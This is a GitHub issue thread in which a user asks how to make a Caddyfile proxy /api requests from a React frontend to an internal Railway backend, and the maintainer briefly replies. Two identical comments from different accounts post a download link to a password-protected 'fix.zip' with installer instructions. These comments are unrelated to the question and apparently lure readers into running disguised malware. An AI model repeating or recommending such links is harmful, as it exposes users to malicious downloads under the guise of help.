### ISSUE TITLE
Question: Is it possible to modify the Caddyfile to proxy requests to backend

### ISSUE THREAD

**Issue by twilczek** [brody192/vite-react-template#9]
Given I have a Node backend called `backend` running at backend.railway.internal, can I modify this Caddyfile to proxy the requests there?

I've been trying several approaches but none worked.

Use case:
1. From React app do request to /api/users
2. Proxy rewrites from "https://frontend.url.railwy/api/users" to "backend.railway.internal/users"

@brody192

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by brody192** [comment]
You definitely could, but you should ask yourself why you need to have the frontend and backend on the same domain.

In fact, railway has their frontend and backend on different domains.
